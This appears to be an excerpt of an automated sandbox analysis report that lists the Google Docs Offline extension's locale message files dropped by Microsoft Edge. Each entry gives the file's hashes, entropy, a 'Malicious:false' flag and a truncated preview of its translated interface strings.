                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2771
                                                                                                                                                                Entropy (8bit):3.7629875118570055
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):858
                                                                                                                                                                Entropy (8bit):4.474411340525479
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):954
                                                                                                                                                                Entropy (8bit):4.6457079159286545
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):899
                                                                                                                                                                Entropy (8bit):4.474743599345443
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2230
                                                                                                                                                                Entropy (8bit):3.8239097369647634
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                Entropy (8bit):5.292894989863142
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3264
                                                                                                                                                                Entropy (8bit):3.586016059431306
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3235
                                                                                                                                                                Entropy (8bit):3.6081439490236464
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3122
                                                                                                                                                                Entropy (8bit):3.891443295908904
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1895
                                                                                                                                                                Entropy (8bit):4.28990403715536
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1042
                                                                                                                                                                Entropy (8bit):5.3945675025513955
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2535
                                                                                                                                                                Entropy (8bit):3.8479764584971368
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1028
                                                                                                                                                                Entropy (8bit):4.797571191712988
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
